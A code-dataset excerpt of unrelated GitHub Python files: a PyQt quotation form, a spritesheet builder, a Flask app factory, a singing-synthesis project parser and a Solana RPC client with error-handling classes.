self.w.labelDestination.setFont(font)\n self.w.labelDestination.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelDestination.setObjectName('labelDestination')\n self.w.verticalLayout_26.addWidget(self.w.labelDestination)\n self.w.comboDestination = SearchCombo(self.w.groupGeographical)\n self.w.comboDestination.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboDestination.setFont(font)\n self.w.comboDestination.setObjectName('comboDestination')\n self.w.verticalLayout_26.addWidget(self.w.comboDestination)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_26)\n self.w.verticalLayout_5.addWidget(self.w.groupGeographical)\n self.w.horizontalLayout.addLayout(self.w.verticalLayout_5)\n spacerItem6 = QtWidgets.QSpacerItem(35, 0, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout.addItem(spacerItem6)\n self.w.verticalLayout_11.addLayout(self.w.horizontalLayout)\n spacerItem7 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.w.verticalLayout_11.addItem(spacerItem7)\n self.w.priceBarChart = PriceBarChart(self.my_strings)\n self.w.verticalLayout_11.addWidget(self.w.priceBarChart)\n spacerItem8 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.w.verticalLayout_11.addItem(spacerItem8)\n self.w.verticalLayout_11.setStretch(2, 1)\n self.w.horizontalLayout_7.addLayout(self.w.verticalLayout_11)\n spacerItem9 = QtWidgets.QSpacerItem(50, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem9)\n self.w.horizontalLayout_7.setStretch(0, 2)\n self.w.horizontalLayout_7.setStretch(1, 4)\n self.w.horizontalLayout_7.setStretch(2, 2)\n self.w.horizontalLayout_7.setStretch(3, 4)\n self.w.horizontalLayout_7.setStretch(5, 5)\n self.w.horizontalLayout_7.setStretch(6, 2)\n self.w.scrollArea.setWidget(self.w.scrollAreaWidgetContents)\n self.w.verticalLayout.addWidget(self.w.scrollArea)\n self.w.horizontalLayout_13 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_13.setSpacing(30)\n self.w.horizontalLayout_13.setObjectName('horizontalLayout_13')\n spacerItem10 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_13.addItem(spacerItem10)\n self.w.buttonNew = QtWidgets.QToolButton(self.w.centralWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.w.buttonNew.sizePolicy().hasHeightForWidth())\n self.w.buttonNew.setSizePolicy(sizePolicy)\n self.w.buttonNew.setMaximumSize(QtCore.QSize(200, 16777215))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.w.buttonNew.setFont(font)\n self.w.buttonNew.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonNew.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)\n self.w.buttonNew.setObjectName('buttonNew')\n self.w.horizontalLayout_13.addWidget(self.w.buttonNew)\n self.w.buttonOverwrite = QtWidgets.QToolButton(self.w.centralWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.w.buttonOverwrite.sizePolicy().hasHeightForWidth())\n self.w.buttonOverwrite.setSizePolicy(sizePolicy)\n 
self.w.buttonOverwrite.setMaximumSize(QtCore.QSize(200, 16777215))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.w.buttonOverwrite.setFont(font)\n self.w.buttonOverwrite.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonOverwrite.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)\n self.w.buttonOverwrite.setObjectName('buttonOverwrite')\n self.w.horizontalLayout_13.addWidget(self.w.buttonOverwrite)\n spacerItem11 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_13.addItem(spacerItem11)\n self.w.verticalLayout.addLayout(self.w.horizontalLayout_13)\n spacerItem12 = QtWidgets.QSpacerItem(10, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n self.w.verticalLayout.addItem(spacerItem12)\n self.w.setCentralWidget(self.w.centralWidget)\n\n self.w.labelTitle.setText(self.my_strings.title_panel_quotation)\n self.w.labelCompany.setText(f\"{color_gray(self.my_strings.label_company)} {color_red('*')}\")\n self.w.labelMark.setText(color_gray(self.my_strings.label_mark))\n self.w.labelTotalPower.setText(f\"{color_gray(self.my_strings.label_total_power)} {color_red('*')}\")\n self.w.labelPrice.setText(f\"{color_gray(self.my_strings.label_price)} {color_red('*')}\")\n self.w.labelDateQuotation.setText(color_gray(self.my_strings.label_date_quotation))\n self.w.labelDateValidity.setText(color_gray(self.my_strings.label_date_validity))\n self.w.labelNContacts.setText(color_gray(self.my_strings.label_n_contacts))\n self.w.labelUser.setText(f\"{color_gray(self.my_strings.label_user)} {color_red('*')}\")\n self.w.labelObservations.setText(color_gray(self.my_strings.label_observations))\n self.w.labelPanelType.setText(color_gray(self.my_strings.label_type))\n self.w.labelCells.setText(color_gray(self.my_strings.label_cells))\n self.w.labelPanelPower.setText(f\"{color_gray(self.my_strings.label_panel_power)} {color_red('*')}\")\n self.w.labelEfficiency.setText(color_gray(self.my_strings.label_efficiency))\n self.w.labelWarrantyProduct.setText(color_gray(self.my_strings.label_warranty_product))\n self.w.labelWarrantyPerformance.setText(color_gray(self.my_strings.label_warranty_performance))\n self.w.labelCertificates.setText(color_gray(self.my_strings.label_certificates))\n self.w.labelIncoterm.setText(color_gray(self.my_strings.label_incoterm))\n self.w.labelMadeIn.setText(color_gray(self.my_strings.label_made_in))\n self.w.labelOrigin.setText(color_gray(self.my_strings.label_origin))\n self.w.labelDestination.setText(color_gray(self.my_strings.label_destination))\n\n self.w.buttonBack.setIcon(QtGui.QIcon(url_back))\n self.w.buttonBack.setIconSize(QtCore.QSize(32, 32))\n self.w.buttonNew.setIcon(QtGui.QIcon(url_save))\n self.w.buttonNew.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonNew.setText(self.my_strings.button_new)\n self.w.buttonOverwrite.setIcon(QtGui.QIcon(url_save))\n self.w.buttonOverwrite.setIconSize(QtCore.QSize(40, 40))\n self.w.buttonOverwrite.setText(self.my_strings.button_overwrite)\n self.w.buttonOverwrite.setVisible(False)\n self.w.buttonAddCompany.setIcon(QtGui.QIcon(url_plus))\n self.w.buttonAddCompany.setIconSize(QtCore.QSize(12, 12))\n\n self.w.radioPositiveTolerance.setText(self.my_strings.radio_positive)\n self.w.radioNegativeTolerance.setText(self.my_strings.radio_negative)\n\n self.w.spinTotalPower.setSuffix(' kW')\n self.w.spinPrice.setSuffix(' €/W')\n self.w.spinPanelPower.setSuffix(' W')\n self.w.spinEfficiency.setSuffix(' %')\n self._update_suffix_year()\n\n today = 
QtCore.QDate.currentDate()\n self.w.dateQuotation.setDate(today)\n self.w.dateValidity.setDate(today.addDays(30))\n\n self.w.groupGeneral.setTitle(self.my_strings.group_general)\n self.w.groupPanel.setTitle(self.my_strings.group_panel)\n self.w.groupGeographical.setTitle(self.my_strings.group_geographical)\n self.w.groupTolerance.setTitle(self.my_strings.group_tolerance)\n self.w.groupTolerance.setStyleSheet('QGroupBox:title {color: #555555}')\n\n # Coloring\n self.w.centralWidget.setStyleSheet('.QWidget{background-color: rgb(238, 240, 245)}')\n\n def connect_signals(self, controller):\n super(GPanelQuotation, self).connect_signals(controller)\n super(GPriceBarChart, self).connect_signals(controller)\n super(GPanel, self).connect_signals(controller)\n\n self.w.comboCompany.currentTextChanged.connect(lambda: self.w.comboCompany.validate_hard())\n self.w.comboPanelType.currentTextChanged.connect(lambda: self.w.comboPanelType.validate_soft())\n self.w.comboPanelType.currentTextChanged.connect(lambda: controller.update_current_type_average())\n self.w.comboCells.currentTextChanged.connect(lambda: self.w.comboCells.validate_soft())\n\n self.w.dateQuotation.dateChanged.connect(controller.changed_date)\n self.w.dateValidity.dateChanged.connect(controller.changed_date)\n\n @property\n def cells(self):\n return self.w.comboCells.currentText()\n\n @cells.setter\n def cells(self, text):\n self.w.comboCells.setCurrentText(text)\n\n @property\n def data(self):\n Data = namedtuple('Data',\n ('company', 'mark', 'total_power', 'price', 'date_quotation', 'date_validity', 'n_contacts',\n 'user', 'observations', 'panel_type', 'cells', 'panel_power', 'efficiency', 'tolerance',\n 'warranty_product', 'warranty_performance', 'certificates', 'incoterm', 'made_in', 'origin',\n 'destination')\n )\n return Data(\n self.company,\n self.mark,\n self.total_power,\n self.price,\n self.date_quotation,\n self.date_validity,\n self.n_contacts,\n self.user,\n self.observations,\n\n self.panel_type,\n self.cells,\n self.panel_power,\n self.efficiency,\n self.tolerance,\n self.warranty_product,\n self.warranty_performance,\n self.checked_certificates,\n\n self.incoterm,\n self.made_in,\n self.origin,\n self.destination\n )\n\n @property\n def panel_type(self):\n return self.w.comboPanelType.currentText()\n\n @panel_type.setter\n def panel_type(self, text):\n self.w.comboPanelType.setCurrentText(text)\n\n def load_initial_data(self,\n company_names,\n mark_names,\n date_quotation,\n date_validity,\n user_names,\n last_user,\n panel_type_names,\n cells_numbers,\n certificate_names,\n incoterm_names,\n place_names,\n default):\n self.w.comboCompany.items = company_names\n self.w.comboMark.items = mark_names\n self.w.comboUser.items = user_names\n self.w.comboPanelType.items = panel_type_names\n self.w.comboCells.items = cells_numbers\n self.w.buttonCertificates.items = certificate_names\n self.w.comboIncoterm.items = incoterm_names\n self.w.comboMadeIn.items = place_names\n self.w.comboOrigin.items = place_names\n self.w.comboDestination.items = place_names\n\n if default:\n self.date_quotation = date_quotation\n self.date_validity = date_validity\n if last_user:\n self.user = last_user.name\n\n self.w.spinTotalPower.validate_hard()\n self.w.spinPrice.validate_hard()\n self.w.comboUser.validate_hard()\n self.w.spinPanelPower.validate_hard()\n else:\n self.w.comboMark.validate_soft()\n self.w.comboUser.validate_soft()\n self.w.comboPanelType.validate_soft()\n self.w.comboCells.validate_soft()\n 
self.w.comboIncoterm.validate_soft()\n self.w.comboMadeIn.validate_soft()\n self.w.comboOrigin.validate_soft()\n self.w.comboDestination.validate_soft()\n\n def load_item_data(self, panel_quotation):\n self.company = panel_quotation.company\n self.mark = panel_quotation.mark\n self.total_power = panel_quotation.total_power\n self.price = panel_quotation.price\n self.date_quotation = panel_quotation.date_quotation\n self.date_validity = panel_quotation.date_validity\n self.n_contacts = panel_quotation.n_contacts\n self.user = panel_quotation.user\n self.observations = panel_quotation.observations\n\n self.panel_type = panel_quotation.panel_type\n self.cells = panel_quotation.cells\n self.panel_power = panel_quotation.panel_power\n self.efficiency = panel_quotation.efficiency\n self.tolerance = panel_quotation.tolerance\n self.warranty_product = panel_quotation.warranty_product\n self.warranty_performance = panel_quotation.warranty_performance\n self.checked_certificates = panel_quotation.certificates\n\n self.incoterm = panel_quotation.incoterm\n self.made_in = panel_quotation.made_in\n self.origin = panel_quotation.origin\n self.destination = panel_quotation.destination\n","repo_name":"AlberLC/complete-qt-app","sub_path":"guis/g_panel_quotation.py","file_name":"g_panel_quotation.py","file_ext":"py","file_size_in_byte":45892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23937235530","text":"from settings import *\n\nimport numpy as np\nimport cv2\nimport os\nimport math\nimport subprocess\nfrom tqdm import tqdm\n\nRE_STRIP = False\n\nANIMS_TO_JOIN = [ \"srun\", \"frun\", \"brun\" ]\nDO_ALL = False\n\n# ANIMS_TO_JOIN = [ \"idle\", \"srun-interp\", \"frun-interp\", \"brun-interp\" ]\n# DO_ALL = True\n\nSPRITESHEET_RESCALE = 0.5 # scale factor applied to every sprite before packing\nSPRITESHEET_MAX_WIDTH = 16384 # maximum sheet width in pixels; wider content wraps onto extra rows\n\ndef create_spritesheet(imgs):\n row_count = 1\n row_size = len(imgs)\n h, w = imgs[0].shape[0], sum([img.shape[1] for img in imgs])\n dy = h\n\n new_w = w\n while new_w > SPRITESHEET_MAX_WIDTH:\n row_count *= 2\n row_size = math.ceil(len(imgs) / float(row_count))\n new_w = row_size * imgs[0].shape[0]\n h, w = h * row_count, new_w\n\n print(f\"Final spritesheet size: {row_size}x{row_count} ({w}x{h})\")\n\n output_img = np.zeros((h, w, imgs[0].shape[2]))\n img_i = 0\n for row_i in range(row_count):\n x = 0\n for _ in range(row_size):\n img = imgs[img_i]\n dx = img.shape[1]\n\n output_img[dy*row_i:dy*(row_i+1),x:x+dx] = img\n\n x += dx\n img_i += 1\n if img_i >= len(imgs): break\n if img_i >= len(imgs): break\n\n return output_img\n\ndef main():\n assert os.path.exists(RENDERS_PATH), f\"Could not find renders root, run render.py or check settings, settings.py says it is RENDERS_PATH='{RENDERS_PATH}'\"\n \n sprites = []\n for anim_folder in ANIMS_TO_JOIN:\n render_root = f\"{RENDERS_PATH}/{anim_folder}\"\n assert os.path.exists(render_root), f\"Could not find render_root '{render_root}', check ANIMS_TO_JOIN variable or run render.py\"\n\n for iter in range(1, 1000):\n touch_file_path = f\"{render_root}/.iter{iter:03}\"\n if not os.path.exists(touch_file_path): break\n iter_str = f\"iter{(iter - 1):03}\"\n print(f\"{anim_folder}: {iter_str}\")\n\n files = [f for f in os.listdir(render_root) if (DO_ALL or f\"{iter_str}_n_\" in f) and (\"_s.png\" not in f and \"_s_\" not in f)]\n print(f\" {files}\")\n for file in tqdm(files):\n stripped = f\"{render_root}/\" + (file.replace(\".png\", \"_s.png\") if DO_ALL else 
file.replace(f\"{iter_str}_n_\", f\"{iter_str}_s_\"))\n assert file not in stripped, \"did not change filename\"\n if RE_STRIP or not os.path.exists(stripped):\n subprocess.call([\"rembg\", \"i\", f\"{render_root}/{file}\", stripped])\n img = cv2.imread(stripped, cv2.IMREAD_UNCHANGED)\n assert img is not None, f\"Stripped img was not loaded properly, tried with path '{stripped}'\"\n sprites.append(cv2.resize(img, (int(SPRITESHEET_RESCALE*img.shape[1]), int(SPRITESHEET_RESCALE*img.shape[0]))))\n \n sheet = create_spritesheet(sprites)\n cv2.imwrite(f\"{WORKSPACE}/{SPRITESHEET_NAME}\", sheet)\n\nif __name__ == \"__main__\":\n main()","repo_name":"tobias17/sd-exodia","sub_path":"spritesheet.py","file_name":"spritesheet.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"61"} +{"seq_id":"41750047126","text":"from flask import Flask, g, redirect, url_for, render_template\nimport os\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n\n app.config.from_mapping(\n SECRET_KEY=os.environ['SECRET_KEY'],\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n from . import db\n db.init_app(app)\n\n # Register blueprints\n from . import auth\n app.register_blueprint(auth.bp)\n app.add_url_rule('/auth', endpoint='auth_index')\n\n from . import admin\n app.register_blueprint(admin.bp)\n app.add_url_rule('/admin', endpoint='admin.login')\n\n from . import bet\n app.register_blueprint(bet.bp)\n\n from . import leaderboard\n app.register_blueprint(leaderboard.bp)\n app.add_url_rule('/leaderboard', endpoint='leaderboard')\n\n from . 
import race\n app.register_blueprint(race.bp)\n\n # Home page\n @app.route('/')\n def index():\n if g.user is None:\n return redirect(url_for('auth_index'))\n return redirect(url_for('leaderboard'))\n\n # Error handlers\n @app.errorhandler(404)\n def page_not_found(error):\n return render_template('errors/404.html'), 404\n\n @app.errorhandler(403)\n def permission_denied(error):\n return render_template('errors/403.html'), 403\n\n return app","repo_name":"madisonkeene/horseracing","sub_path":"horseracing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28908239856","text":"import dataclasses\nfrom typing import Optional\n\nfrom libresvip.model.base import (\n InstrumentalTrack,\n Note,\n Project,\n SingingTrack,\n SongTempo,\n TimeSignature,\n)\n\nfrom .model import (\n PpsfAudioTrackItem,\n PpsfDvlTrackEvent,\n PpsfDvlTrackItem,\n PpsfMeters,\n PpsfProject,\n PpsfTempos,\n)\nfrom .options import InputOptions\n\n\n@dataclasses.dataclass\nclass PiaproStudioParser:\n options: InputOptions\n\n def parse_project(self, ppsf_project: PpsfProject) -> Project:\n time_signatures = self.parse_time_signatures(ppsf_project.ppsf.project.meter)\n tempos = self.parse_tempos(ppsf_project.ppsf.project.tempo)\n singing_tracks = self.parse_singing_tracks(ppsf_project.ppsf.project.dvl_track)\n instrumental_tracks = self.parse_instrumental_tracks(\n ppsf_project.ppsf.project.audio_track\n )\n return Project(\n time_signature_list=time_signatures,\n song_tempo_list=tempos,\n track_list=singing_tracks + instrumental_tracks,\n )\n\n def parse_time_signatures(self, ppsf_meters: PpsfMeters) -> list[TimeSignature]:\n time_signatures = []\n first_time_signature = TimeSignature(\n numerator=ppsf_meters.const.nume,\n denominator=ppsf_meters.const.denomi,\n )\n if ppsf_meters.use_sequence:\n for meter in ppsf_meters.sequence:\n time_signatures.append(\n TimeSignature(\n numerator=meter.nume,\n denominator=meter.denomi,\n bar_index=meter.measure,\n )\n )\n if not len(time_signatures) or time_signatures[0].bar_index != 0:\n time_signatures.insert(0, first_time_signature)\n return time_signatures\n\n def parse_tempos(self, ppsf_tempos: PpsfTempos) -> list[SongTempo]:\n tempos = []\n first_tempo = SongTempo(bpm=ppsf_tempos.const / 10000, position=0)\n if ppsf_tempos.use_sequence:\n for tempo in ppsf_tempos.sequence:\n tempos.append(SongTempo(bpm=tempo.value / 10000, position=tempo.tick))\n if not len(tempos) or tempos[0].position != 0:\n tempos.insert(0, first_tempo)\n return tempos\n\n def parse_instrumental_tracks(\n self, ppsf_audio_tracks: list[PpsfAudioTrackItem]\n ) -> list[InstrumentalTrack]:\n tracks = []\n for track in ppsf_audio_tracks:\n for i, event in enumerate(track.events):\n instrumental_track = InstrumentalTrack(\n title=f\"{track.name} {i + 1}\",\n audio_file_path=event.file_audio_data.file_path,\n offset=event.tick_pos,\n )\n tracks.append(instrumental_track)\n return tracks\n\n def parse_singing_tracks(\n self, ppsf_dvl_tracks: Optional[list[PpsfDvlTrackItem]]\n ) -> list[SingingTrack]:\n tracks = []\n if ppsf_dvl_tracks is not None:\n for track in ppsf_dvl_tracks:\n singing_track = SingingTrack(\n title=track.name,\n ai_singer_name=track.singer.singer_name,\n note_list=self.parse_notes(track.events),\n )\n tracks.append(singing_track)\n return tracks\n\n def parse_notes(self, ppsf_dvl_track_events: list[PpsfDvlTrackEvent]) -> list[Note]:\n return [\n Note(\n 
key_number=event.note_number,\n start_pos=event.pos,\n length=event.length,\n lyric=event.lyric,\n )\n for event in ppsf_dvl_track_events\n if event.enabled\n ]\n","repo_name":"SoulMelody/LibreSVIP","sub_path":"libresvip/plugins/ppsf/piapro_studio_parser.py","file_name":"piapro_studio_parser.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"23527457070","text":"import datetime\nimport json\nimport logging\nimport requests\nimport time\nimport typing\n\n\nfrom base64 import b64decode\nfrom decimal import Decimal\nfrom solana.blockhash import Blockhash, BlockhashCache\nfrom solana.keypair import Keypair\nfrom solana.publickey import PublicKey\nfrom solana.rpc.api import Client\nfrom solana.rpc.commitment import Commitment\nfrom solana.rpc.providers.http import HTTPProvider\nfrom solana.rpc.types import DataSliceOpts, MemcmpOpts, RPCMethod, RPCResponse, TokenAccountOpts, TxOpts\nfrom solana.transaction import Transaction\n\nfrom .constants import SOL_DECIMAL_DIVISOR\nfrom .instructionreporter import InstructionReporter\nfrom .logmessages import expand_log_messages\n\n\n# # 🥭 ClientException class\n#\n# A `ClientException` exception base class for all errors this client raises, carrying the\n# client name and cluster URL for better error reporting.\n#\nclass ClientException(Exception):\n def __init__(self, message: str, name: str, cluster_url: str) -> None:\n super().__init__(message)\n self.message: str = message\n self.name: str = name\n self.cluster_url: str = cluster_url\n\n def __str__(self) -> str:\n return f\"« {type(self)} '{self.message}' from '{self.name}' on {self.cluster_url} »\"\n\n def __repr__(self) -> str:\n return f\"{self}\"\n\n\n# # 🥭 RateLimitException class\n#\n# A `RateLimitException` exception base class that allows trapping and handling rate limiting\n# independent of other error handling.\n#\nclass RateLimitException(ClientException):\n pass\n\n\n# # 🥭 TooMuchBandwidthRateLimitException class\n#\n# A `TooMuchBandwidthRateLimitException` exception that specialises the `RateLimitException`\n# for when too much bandwidth has been consumed.\n#\nclass TooMuchBandwidthRateLimitException(RateLimitException):\n pass\n\n\n# # 🥭 TooManyRequestsRateLimitException class\n#\n# A `TooManyRequestsRateLimitException` exception that specialises the `RateLimitException`\n# for when too many requests have been sent in a short time.\n#\nclass TooManyRequestsRateLimitException(RateLimitException):\n pass\n\n\n# # 🥭 BlockhashNotFoundException class\n#\n# A `BlockhashNotFoundException` exception allows trapping and handling exceptions when a blockhash is sent that\n# the node doesn't understand. 
This can happen when the blockhash is too old (and the node no longer\n# considers it 'recent') or when it's too new (and hasn't yet made it to the node that is responding).\n#\nclass BlockhashNotFoundException(ClientException):\n def __init__(self, name: str, cluster_url: str, blockhash: typing.Optional[Blockhash] = None) -> None:\n message: str = f\"Blockhash '{blockhash}' not found on {cluster_url}.\"\n super().__init__(message, name, cluster_url)\n self.blockhash: typing.Optional[Blockhash] = blockhash\n\n def __str__(self) -> str:\n return f\"« BlockhashNotFoundException '{self.name}' [{self.blockhash}] on {self.cluster_url} »\"\n\n\n# # 🥭 NodeIsBehindException class\n#\n# A `NodeIsBehindException` exception allows trapping and handling exceptions when a node is behind by too\n# many slots.\n#\nclass NodeIsBehindException(ClientException):\n def __init__(self, name: str, cluster_url: str, slots_behind: int) -> None:\n message: str = f\"Node is behind by {slots_behind} slots.\"\n super().__init__(message, name, cluster_url)\n self.slots_behind: int = slots_behind\n\n def __str__(self) -> str:\n return f\"« NodeIsBehindException '{self.name}' [behind by {self.slots_behind} slots] on {self.cluster_url} »\"\n\n\n# # 🥭 FailedToFetchBlockhashException class\n#\n# A `FailedToFetchBlockhashException` exception allows trapping and handling exceptions when we fail\n# to fetch a recent or distinct blockhash.\n#\nclass FailedToFetchBlockhashException(ClientException):\n def __init__(self, message: str, name: str, cluster_url: str, pauses: typing.Sequence[float]) -> None:\n super().__init__(message, name, cluster_url)\n self.pauses: typing.Sequence[float] = pauses\n\n def __str__(self) -> str:\n if len(self.pauses) == 0:\n return f\"« FailedToFetchBlockhashException '{self.name}' Failed to get recent blockhash on {self.cluster_url} »\"\n\n pauses_text = \",\".join(f\"{pause}\" for pause in self.pauses[:-1])\n return f\"« FailedToFetchBlockhashException '{self.name}' Failed to get a fresh, recent blockhash after {len(self.pauses)} attempts - paused {pauses_text} seconds between attempts on {self.cluster_url} »\"\n\n\n# # 🥭 TransactionException class\n#\n# A `TransactionException` exception that can provide additional error data, or at least better output\n# of problems at the right place.\n#\nclass TransactionException(ClientException):\n def __init__(self, transaction: typing.Optional[Transaction], message: str, code: int, name: str, cluster_url: str, rpc_method: str, request_text: str, response_text: str, accounts: typing.Union[str, typing.List[str], None], errors: typing.Union[str, typing.List[str], None], logs: typing.Union[str, typing.List[str], None], instruction_reporter: InstructionReporter = InstructionReporter()) -> None:\n super().__init__(message, name, cluster_url)\n self.transaction: typing.Optional[Transaction] = transaction\n self.code: int = code\n self.rpc_method: str = rpc_method\n self.request_text: str = request_text\n self.response_text: str = response_text\n\n def _ensure_list(item: typing.Union[str, typing.List[str], None]) -> typing.List[str]:\n if item is None:\n return []\n if isinstance(item, str):\n return [item]\n if isinstance(item, list):\n return item\n return [f\"{item}\"]\n self.accounts: typing.Sequence[str] = _ensure_list(accounts)\n self.errors: typing.Sequence[str] = _ensure_list(errors)\n self.logs: typing.Sequence[str] = expand_log_messages(_ensure_list(logs))\n self.instruction_reporter: InstructionReporter = instruction_reporter\n\n def 
__str__(self) -> str:\n request_details: str = \"\"\n response_details: str = \"\"\n if logging.DEBUG >= logging.root.level:\n request_details = f\"\"\"\n Request:\n {self.request_text}\"\"\"\n response_details = f\"\"\"\n Response:\n {self.response_text}\"\"\"\n transaction_details = \"\"\n if self.transaction is not None:\n instruction_details = \"\n\".join(list(map(self.instruction_reporter.report, self.transaction.instructions)))\n transaction_details = \"\n Instructions:\n \" + instruction_details.replace(\"\n\", \"\n \")\n accounts = \"No Accounts\"\n if len(self.accounts) > 0:\n accounts = \"\n \".join([f\"{item}\".replace(\"\n\", \"\n \") for item in self.accounts])\n errors = \"No Errors\"\n if len(self.errors) > 0:\n errors = \"\n \".join([f\"{item}\".replace(\"\n\", \"\n \") for item in self.errors])\n logs = \"No Logs\"\n if len(self.logs) > 0:\n logs = \"\n \".join([f\"{item}\".replace(\"\n\", \"\n \") for item in self.logs])\n return f\"\"\"« 𝚃𝚛𝚊𝚗𝚜𝚊𝚌𝚝𝚒𝚘𝚗𝙴𝚡𝚌𝚎𝚙𝚝𝚒𝚘𝚗 in '{self.name}' [{self.rpc_method}]: {self.code}:: {self.message}{transaction_details}\n Accounts:\n {accounts}\n Errors:\n {errors}\n Logs:\n {logs}{request_details}{response_details}\n»\"\"\"\n\n def __repr__(self) -> str:\n return f\"{self}\"\n\n\nUnspecifiedCommitment = Commitment(\"unspecified\")\nUnspecifiedEncoding = \"unspecified\"\n\n\n# # 🥭 ErrorHandlingProvider class\n#\n# An `ErrorHandlingProvider` extends the HTTPProvider with better error handling.\n#\nclass ErrorHandlingProvider(HTTPProvider):\n def __init__(self, name: str, cluster_url: str, instruction_reporter: InstructionReporter):\n super().__init__(cluster_url)\n self.name: str = name\n self.cluster_url: str = cluster_url\n self.instruction_reporter: InstructionReporter = instruction_reporter\n\n def make_request(self, method: RPCMethod, *params: typing.Any) -> RPCResponse:\n # This is the entire method in HTTPProvider that we're overriding here:\n #\n # \"\"\"Make an HTTP request to an http rpc endpoint.\"\"\"\n # request_kwargs = self._before_request(method=method, params=params, is_async=False)\n # raw_response = requests.post(**request_kwargs)\n # return self._after_request(raw_response=raw_response, method=method)\n\n request_kwargs = self._before_request(method=method, params=params, is_async=False)\n raw_response = requests.post(**request_kwargs)\n\n # Some custom exceptions specifically for rate-limiting. This allows calling code to handle this\n # specific case if they so choose.\n #\n # \"You will see HTTP response codes 429 for too many requests or 413 for too much bandwidth.\"\n if raw_response.status_code == 413:\n raise TooMuchBandwidthRateLimitException(\n f\"Rate limited (too much bandwidth) calling method '{method}'.\", self.name, self.cluster_url)\n elif raw_response.status_code == 429:\n raise TooManyRequestsRateLimitException(\n f\"Rate limited (too many requests) calling method '{method}'.\", self.name, self.cluster_url)\n\n # Not a rate-limit problem, but maybe there was some other error?\n raw_response.raise_for_status()\n\n # All seems OK, but maybe the server returned an error? 
If so, try to pass on as much\n # information as we can.\n response_text: str = raw_response.text\n response: typing.Dict[str, typing.Any] = json.loads(response_text)\n if \"error\" in response:\n if isinstance(response[\"error\"], str):\n message: str = typing.cast(str, response[\"error\"])\n raise ClientException(f\"Transaction failed: '{message}'\", self.name, self.cluster_url)\n else:\n error = response[\"error\"]\n error_message: str = error[\"message\"] if \"message\" in error else \"No message\"\n error_data: typing.Dict[str, typing.Any] = error[\"data\"] if \"data\" in error else {}\n error_accounts = error_data[\"accounts\"] if \"accounts\" in error_data else \"No accounts\"\n error_code: int = error[\"code\"] if \"code\" in error else -1\n error_err = error_data[\"err\"] if \"err\" in error_data else \"No error text returned\"\n error_logs = error_data[\"logs\"] if \"logs\" in error_data else \"No logs\"\n parameters = json.dumps({\"jsonrpc\": \"2.0\", \"method\": method, \"params\": params})\n\n transaction: typing.Optional[Transaction] = None\n blockhash: typing.Optional[Blockhash] = None\n if method == \"sendTransaction\":\n transaction = Transaction.deserialize(b64decode(params[0]))\n blockhash = transaction.recent_blockhash\n\n if error_code == -32005:\n slots_behind: int = error[\"data\"][\"numSlotsBehind\"] if \"numSlotsBehind\" in error[\"data\"] else -1\n raise NodeIsBehindException(self.name, self.cluster_url, slots_behind)\n\n if error_err == \"BlockhashNotFound\":\n raise BlockhashNotFoundException(self.name, self.cluster_url, blockhash)\n\n exception_message: str = f\"Transaction failed with: '{error_message}'\"\n raise TransactionException(transaction, exception_message, error_code, self.name,\n self.cluster_url, method, parameters, response_text, error_accounts,\n error_err, error_logs, self.instruction_reporter)\n\n # The call succeeded.\n return typing.cast(RPCResponse, response)\n\n\nclass BetterClient:\n def __init__(self, client: Client, name: str, cluster_name: str, cluster_url: str, commitment: Commitment, skip_preflight: bool, encoding: str, blockhash_cache_duration: int, instruction_reporter: InstructionReporter) -> None:\n self.logger: logging.Logger = logging.getLogger(self.__class__.__name__)\n self.compatible_client: Client = client\n self.name: str = name\n self.cluster_name: str = cluster_name\n self.cluster_url: str = cluster_url\n self.commitment: Commitment = commitment\n self.skip_preflight: bool = skip_preflight\n self.encoding: str = encoding\n self.blockhash_cache_duration: int = 